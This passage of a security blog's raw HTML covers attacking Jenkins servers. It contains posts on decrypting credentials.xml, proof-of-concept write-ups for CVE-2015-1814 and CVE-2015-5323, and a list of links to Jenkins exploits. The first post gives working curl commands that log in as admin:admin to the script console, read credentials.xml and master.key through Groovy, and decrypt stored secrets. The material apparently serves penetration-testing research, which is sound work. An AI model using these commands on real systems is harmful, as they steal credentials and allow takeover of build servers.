<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQIHvKbwhDc3MnTLBUNVpJpO-SYFTD9LzT4EI-9F32ceUTTmNFzasq3UhNcROCNsyoaj31MCCjfagBiz7AaA2niGeV67HrTq7Hx-jBX2myMapp9c3Lnafej497JkJy9T5TlaOmcDfAI6w/s1600/Screen+Shot+2019-02-28+at+10.02.18+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="840" data-original-width="1566" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQIHvKbwhDc3MnTLBUNVpJpO-SYFTD9LzT4EI-9F32ceUTTmNFzasq3UhNcROCNsyoaj31MCCjfagBiz7AaA2niGeV67HrTq7Hx-jBX2myMapp9c3Lnafej497JkJy9T5TlaOmcDfAI6w/s640/Screen+Shot+2019-02-28+at+10.02.18+AM.png" width="640" /></span></a></div>
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: inherit;"><br /></span>
<span style="color: #444444; font-family: inherit;"><br /></span>
<span style="color: #444444; font-family: inherit;">If you just want to do it with curl you can hit the scriptText endpoint and do something like this:</span></span><br />
<span style="color: #444444; font-family: inherit;"><br />Windows:</span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"</span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: inherit;">Also because this syntax took me a minute to figure out for files in subdirectories:</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+<b>s</b><b>ecrets%5C\master.key</b>%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="color: #444444;">*nix</span></span><br />
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run"</span><br />
<span style="color: #444444;"><span style="color: #444444;"><br /></span>
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Then to decrypt any passwords:</span></span><br />
<span style="color: #444444;"><span style="color: #444444;"><br /></span>
<span style="color: #444444; font-family: "courier new" , "courier" , monospace;">curl -u admin:admin http://10.0.0.160:8080/scriptText --data "script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())"</span></span><br />
<span style="color: #444444;"><span style="color: #444444; font-family: "courier new" , "courier" , monospace;"><br /></span>
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnJuSqASqUWdvE0oTGOlvRV3iDBonwuY0va3DMBKxzN1yaLRNUvcyWhN9lJWfWyuU53FzGI7uSKMZGp4wRofTjfpvUOgsr2Jfm-a_vD70VT1yLfSq4ezUewTEHrjZhmfFhK8AJOAAkfQ4/s1600/Screen+Shot+2019-02-28+at+10.04.59+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="111" data-original-width="1600" height="44" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnJuSqASqUWdvE0oTGOlvRV3iDBonwuY0va3DMBKxzN1yaLRNUvcyWhN9lJWfWyuU53FzGI7uSKMZGp4wRofTjfpvUOgsr2Jfm-a_vD70VT1yLfSq4ezUewTEHrjZhmfFhK8AJOAAkfQ4/s640/Screen+Shot+2019-02-28+at+10.04.59+AM.png" width="640" /></span></a></div>
<span style="color: #444444;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
</span><br />
<span style="color: #444444; font-family: inherit;">If you are in a position where you have the files but no access to jenkins you can use:</span><br />
<a href="https://github.com/tweksteen/jenkins-decrypt" target="_blank"><span style="color: #444444;">https://github.com/tweksteen/jenkins-decrypt</span></a><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">There is a small bug in the python when it does the regex and i havent bothered to fix it at the time of this post. But here is version where instead of the regex i'm just printing out the values and you can see the decrypted password. The change is line 55.</span><br />
<span style="color: #444444;"><br /></span>
<script src="https://gist.github.com/carnal0wnage/80611a9c035046b2d400d90303355ff0.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLuVGgZLrxASVed0FYXj8PJ0a5qEfGetD3qgTAXTTJAdJ97B2zcq0qezPogtYE8vor3hbUSfK2vVIXL688vx5OFU6WX0cc0obWV5cZwUKsfKgWr3sxl427v4pQA1mxWFL2Lxx5O6OkeAQ/s1600/Screen+Shot+2019-02-28+at+10.20.54+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: #444444;"><img border="0" data-original-height="251" data-original-width="1600" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLuVGgZLrxASVed0FYXj8PJ0a5qEfGetD3qgTAXTTJAdJ97B2zcq0qezPogtYE8vor3hbUSfK2vVIXL688vx5OFU6WX0cc0obWV5cZwUKsfKgWr3sxl427v4pQA1mxWFL2Lxx5O6OkeAQ/s640/Screen+Shot+2019-02-28+at+10.20.54+AM.png" width="640" /></span></a></div>
<br />
<span style="color: #444444;">Edit 4 March 19: the script only regexs for password (line 72), you might need to swap out the regex if there are ssh keys or other secrets...read the credentials.xml file :-)</span><br />
<span style="color: #444444;"><br /></span>
<span style="color: #444444;">Edit 8 April 19: This tweet outlines another similar way </span><br />
<span style="color: #444444;"><a href="https://twitter.com/netmux/status/1115237815590236160" target="_blank">https://twitter.com/netmux/status/1115237815590236160</a></span><br />
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f2f2f2; background-color: #000000}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-76259180729543277722019-02-27T19:51:00.000-05:002019-02-27T20:00:20.616-05:00Jenkins - SECURITY-180/CVE-2015-1814 PoC<span style="font-family: inherit;"><b>Forced API token change</b></span><br />
<span style="font-family: inherit;"><b><br /></b></span>
<span style="font-family: inherit;">SECURITY-180/CVE-2015-1814</span><br />
<br />
<div>
<a href="https://jenkins.io/security/advisory/2015-03-23/#security-180cve-2015-1814-forced-api-token-change" target="_blank"><span style="font-family: inherit;">https://jenkins.io/security/advisory/2015-03-23/#security-180cve-2015-1814-forced-api-token-change</span></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<div class="sect1" style="background-color: white; box-sizing: border-box; color: #212529;">
<h2 id="affected-versions" style="box-sizing: border-box; color: inherit; line-height: 1.2; margin-bottom: 0.5rem; margin-top: 0px;">
<span style="font-family: inherit; font-size: small;">Affected Versions<span style="font-stretch: normal; font-weight: 500; line-height: 1; padding: 0.4em 1em 0.4em 0.375em;"><a aria-label="Anchor" class="anchorjs-link " data-anchorjs-icon="" href="https://jenkins.io/security/advisory/2015-03-23/#affected-versions" style="background-color: transparent; box-sizing: border-box; color: #006699; font-stretch: normal; line-height: 1; opacity: 0; padding: 0.4em 1em 0.4em 0.375em;"></a></span></span></h2>
<div class="sectionbody" style="box-sizing: border-box;">
<div class="ulist" style="box-sizing: border-box;">
<ul style="box-sizing: border-box; margin-bottom: 1rem; margin-top: 0px;">
<li style="box-sizing: border-box;"><div style="box-sizing: border-box; padding: 0px;">
<span style="font-family: inherit;">All Jenkins releases <= 1.605</span></div>
</li>
<li style="box-sizing: border-box;"><div style="box-sizing: border-box; padding: 0px;">
<span style="font-family: inherit;">All LTS releases <= 1.596.1</span></div>
</li>
</ul>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">PoC</span><br />
<span style="font-family: inherit;">Tested against Jenkins 1.605</span></div>
<div>
<script src="https://gist.github.com/carnal0wnage/fad7c95492224e609ddc47fb08ac8438.js"></script>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<div>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUMNNlMApucEgr08GNPrPpLYl0Y7DDWy-zNeHBWzcGsgdfSFF0YnBHwALxNsVNU8CgZD9hV5ZqNd46Z6fnXTGRyZV6rEqIuWqmUXsHi8gM2gqqRp0b4UDAm8W8z25Ajr8T0NRtqT-59JQ/s1600/Screen+Shot+2019-02-27+at+7.46.30+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="455" data-original-width="1600" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUMNNlMApucEgr08GNPrPpLYl0Y7DDWy-zNeHBWzcGsgdfSFF0YnBHwALxNsVNU8CgZD9hV5ZqNd46Z6fnXTGRyZV6rEqIuWqmUXsHi8gM2gqqRp0b4UDAm8W8z25Ajr8T0NRtqT-59JQ/s640/Screen+Shot+2019-02-27+at+7.46.30+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Burp output</td></tr>
</tbody></table>
<div>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK59TUij35SeTm9EBELz8JyqdosmybjHZdqfbeGNJfLTwWvC1MmbzhZcwKu-EZU0tO0ONY_zSmWnmZQm3hauWx10S3sX5Sv0-oiDpggjFfg8TEfp40ySv8-2Bc9OR0Xga_T8esYD6f7Fs/s1600/Screen+Shot+2019-02-27+at+7.47.37+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="379" data-original-width="1600" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK59TUij35SeTm9EBELz8JyqdosmybjHZdqfbeGNJfLTwWvC1MmbzhZcwKu-EZU0tO0ONY_zSmWnmZQm3hauWx10S3sX5Sv0-oiDpggjFfg8TEfp40ySv8-2Bc9OR0Xga_T8esYD6f7Fs/s640/Screen+Shot+2019-02-27+at+7.47.37+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Validate new token works</td></tr>
</tbody></table>
<div>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<div>
<br />
<br /></div>
</div>
</div>
</div>
<div class="sect1" style="background-color: white; box-sizing: border-box; color: #212529; font-family: lato, Roboto, "Open Sans", sans-serif; font-size: 14px;">
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-10129918453382270372019-02-27T19:14:00.001-05:002019-02-27T19:58:55.383-05:00Jenkins - SECURITY-200 / CVE-2015-5323 PoC<div style="background-color: white; box-sizing: border-box; line-height: 1.2; margin-bottom: 0.5rem; margin-top: 0px;">
<b><span style="font-family: inherit; font-size: large;">API tokens of other users available to admins</span></b><br />
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">SECURITY-200 / CVE-2015-5323</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">API tokens of other users were exposed to admins by default. On instances that don’t implicitly grant RunScripts permission to admins, this allowed admins to run scripts with another user’s credentials.</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<b><span style="font-family: inherit;">Affected versions</span></b></div>
<div style="color: #212529;">
<span style="font-family: inherit;">All Jenkins main line releases up to and including 1.637</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">All Jenkins LTS releases up to and including 1.625.1</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<b><span style="font-family: inherit;">PoC</span></b></div>
<div style="color: #212529;">
<script src="https://gist.github.com/carnal0wnage/1f316c01eaa7707c3cc6497ef04857a8.js"></script><span style="font-family: inherit;">
Tested against Jenkins 1.6.37</span></div>
<div style="color: #212529;">
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">From the script console:</span></div>
<div class="sect2" style="background-color: white; box-sizing: border-box; color: #212529; text-align: left; text-indent: 0px;">
<div class="paragraph" style="box-sizing: border-box;">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="color: #212529; font-style: normal; letter-spacing: normal; margin-left: auto; margin-right: auto; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVmNUInFdYC07ZDI2NIGf00USGaP9VotMG6JjHjV9J0Em3Hs_apnmx8eGX79opGP5coF8xXbVT41YDGIG6o_wIEHW-oqobc9OrU6mjSlbcCQpLThLTi2rLusUdmmSZSRj_MzdzYIs4OG0/s1600/Screen+Shot+2019-02-27+at+6.59.18+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="898" data-original-width="1600" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVmNUInFdYC07ZDI2NIGf00USGaP9VotMG6JjHjV9J0Em3Hs_apnmx8eGX79opGP5coF8xXbVT41YDGIG6o_wIEHW-oqobc9OrU6mjSlbcCQpLThLTi2rLusUdmmSZSRj_MzdzYIs4OG0/s640/Screen+Shot+2019-02-27+at+6.59.18+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "times" , "times new roman" , serif; font-size: small;">run some groovy code to get the token of another user</span></td></tr>
</tbody></table>
<div style="color: #212529; font-style: normal; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="color: #212529; font-style: normal; letter-spacing: normal; margin-left: auto; margin-right: auto; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC9GFHa0FthKQrsDT9JsR-YGnAg_F4YoC6OmFzG681gGnAlNoRXHFNBXAEel2E7X1sVjTmUvVV8n0wqiMQy2WVAPMFGBA3gDNQoa0pHtPSUx45VBpoSu0sUCMLmFWgfs4d6w-apomhoCI/s1600/Screen+Shot+2019-02-27+at+6.59.33+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="317" data-original-width="1600" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC9GFHa0FthKQrsDT9JsR-YGnAg_F4YoC6OmFzG681gGnAlNoRXHFNBXAEel2E7X1sVjTmUvVV8n0wqiMQy2WVAPMFGBA3gDNQoa0pHtPSUx45VBpoSu0sUCMLmFWgfs4d6w-apomhoCI/s640/Screen+Shot+2019-02-27+at+6.59.33+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "times" , "times new roman" , serif; font-size: small;">wrong token</span></td></tr>
</tbody></table>
<div style="color: #212529; font-style: normal; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;">
<span style="font-family: "times" , "times new roman" , serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="color: #212529; font-style: normal; letter-spacing: normal; margin-left: auto; margin-right: auto; text-align: center; text-transform: none; white-space: normal; word-spacing: 0px;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOJ0PVmNV0U7SX6vErqrEwsAzxb5pNk4AyHtwXXapli4y0y50Y20YZ21H4r1VfDODeA_WDJksSlxMf3J-p2TOCod7ZXy8zeXjionfuBtU800LgUfaw08Gry2agDfU0-QE55Dwvhbt392U/s1600/Screen+Shot+2019-02-27+at+6.59.48+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "times" , "times new roman" , serif;"><img border="0" data-original-height="399" data-original-width="1600" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOJ0PVmNV0U7SX6vErqrEwsAzxb5pNk4AyHtwXXapli4y0y50Y20YZ21H4r1VfDODeA_WDJksSlxMf3J-p2TOCod7ZXy8zeXjionfuBtU800LgUfaw08Gry2agDfU0-QE55Dwvhbt392U/s640/Screen+Shot+2019-02-27+at+6.59.48+PM.png" width="640" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "times" , "times new roman" , serif; font-size: small;">correct token</span></td></tr>
</tbody></table>
</div>
</div>
<div style="color: #212529;">
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f2f2f2; background-color: #000000}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8539880144347728238.post-76625409829889854722019-02-27T16:46:00.002-05:002019-03-05T14:02:39.149-05:00Jenkins Master Post<div style="background-color: white; box-sizing: border-box; line-height: 1.2; margin-bottom: 0.5rem; margin-top: 0px;">
<h4>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">A collection of posts on attacking Jenkins</span></h4>
<span style="font-family: "times" , "times new roman" , serif;">
</span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html" target="_blank">http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Manipulating build steps to get RCE</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://medium.com/@uranium238/shodan-jenkins-to-get-rces-on-servers-6b6ec7c960e2" target="_blank">https://medium.com/@uranium238/shodan-jenkins-to-get-rces-on-servers-6b6ec7c960e2</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Using the terminal plugin to get RCE</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://sharadchhetri.com/2018/12/02/managing-jenkins-plugins/" target="_blank">https://sharadchhetri.com/2018/12/02/managing-jenkins-plugins/</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Getting started with Jenkins Plugins</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html" target="_blank">https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Vulns in</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">
</span>
<br />
<ul>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Pipeline: Declarative Plugin up to and including 1.3.4</span></li>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Pipeline: Groovy Plugin up to and including 2.61</span></li>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Script Security Plugin up to and including 1.49</span></li>
</ul>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">Blog post says: This issue has been fixed in Jenkins version 2.121.1 LTS (2.132 weekly).</span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html" target="_blank">http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">CVE-2019-1003000 (https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266)</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://github.com/Coalfire-Research/java-deserialization-exploits/tree/master/Jenkins" target="_blank">https://github.com/Coalfire-Research/java-deserialization-exploits/tree/master/Jenkins</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream" target="_blank">https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">CVE-2015-8103 & CVE-2016-0792</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://github.com/nixawk/labs/tree/master/CVE-2017-1000353" target="_blank">https://github.com/nixawk/labs/tree/master/CVE-2017-1000353</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353" target="_blank">https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353</a></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.twistlock.com/2017/06/18/jenkins-java-deserialization/" target="_blank">https://www.twistlock.com/2017/06/18/jenkins-java-deserialization/</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">CVE-2017-1000353 PoC</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://cloud.tencent.com/developer/article/1165414" target="_blank">https://cloud.tencent.com/developer/article/1165414</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://github.com/anntsmart/CVE" target="_blank">https://github.com/anntsmart/CVE</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">CVE-2018-1999002 (windows) Arbitrary file read</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">
</span>
<br />
<blockquote class="tr_bq">
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">A arbitrary file read vulnerability exists in Jenkins 2.132 and earlier, 2.121.1 and earlier in the Stapler web framework. </span><span style="font-family: "times" , "times new roman" , serif;">Under Windows, directories that don't exist can be traversed by ../, but not for Linux. Then this vulnerability can be read by any file under Windows. Under Linux, you need to have a directory with _ in the Jenkins plugins directory.</span></span></blockquote>
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.crowdstrike.com/blog/your-jenkins-belongs-to-us-now-abusing-continuous-integration-systems/" target="_blank">https://www.crowdstrike.com/blog/your-jenkins-belongs-to-us-now-abusing-continuous-integration-systems/</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/" target="_blank">https://www.n00py.io/2017/01/compromising-jenkins-and-extracting-credentials/</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Decrypting credentials.xml </span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/" target="_blank">https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins, windows, powershell</span><br />
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://securitynews.sonicwall.com/xmlpost/jenkins-ci-server-at-risk-high-risk-vulnerbaility/" target="_blank">https://securitynews.sonicwall.com/xmlpost/jenkins-ci-server-at-risk-high-risk-vulnerbaility/</a></span></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.zdnet.com/article/thousands-of-jenkins-servers-will-let-anonymous-users-become-admins/" target="_blank">https://www.zdnet.com/article/thousands-of-jenkins-servers-will-let-anonymous-users-become-admins/</a></span><br />
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://www.cyberark.com/threat-research-blog/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities/" target="_blank">https://www.cyberark.com/threat-research-blog/tripping-the-jenkins-main-security-circuit-breaker-an-inside-look-at-two-jenkins-security-vulnerabilities/</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">CVE-2018-1999001 </span><span style="font-family: "times" , "times new roman" , serif;">malformed request moves the config.xml file, after restart anyone can log in - couple it with a DoS (CVE-2018-1999043) to force restart </span></span><br />
<ul>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins weekly up to and including 2.132</span></li>
<li><span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins LTS up to and including 2.121.1</span></li>
</ul>
<span style="font-family: "times" , "times new roman" , serif;">
</span><br />
<h4>
<span style="font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><b>CG Posts:</b></span></span></h4>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-new-exploits-pt1.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-messing-with-new-exploits-pt1.html</a></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Username enumeration Jenkins 2.137 and below</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-200-cve-2015-5323-poc.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-200-cve-2015-5323-poc.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">Jenkins - SECURITY-200 / CVE-2015-5323 PoC (</span><span style="font-family: "times" , "times new roman" , serif;">API tokens of other users available to admins)</span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-180cve-2015-1814-poc.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-security-180cve-2015-1814-poc.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;">Jenkins - SECURITY-180/CVE-2015-1814 PoC (Forced Token Change)</span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/02/jenkins-decrypting-credentialsxml.html</a></span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;">Decrypting Jenkins credentials.xml </span></span><br />
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><br /></span></span>
<span style="color: #444444; font-family: "times" , "times new roman" , serif;"><span style="font-family: "times" , "times new roman" , serif;"><a href="https://carnal0wnage.attackresearch.com/2019/03/jenkins-cve-2018-1000600-poc.html" target="_blank">https://carnal0wnage.attackresearch.com/2019/03/jenkins-cve-2018-1000600-poc.html</a></span></span><br />
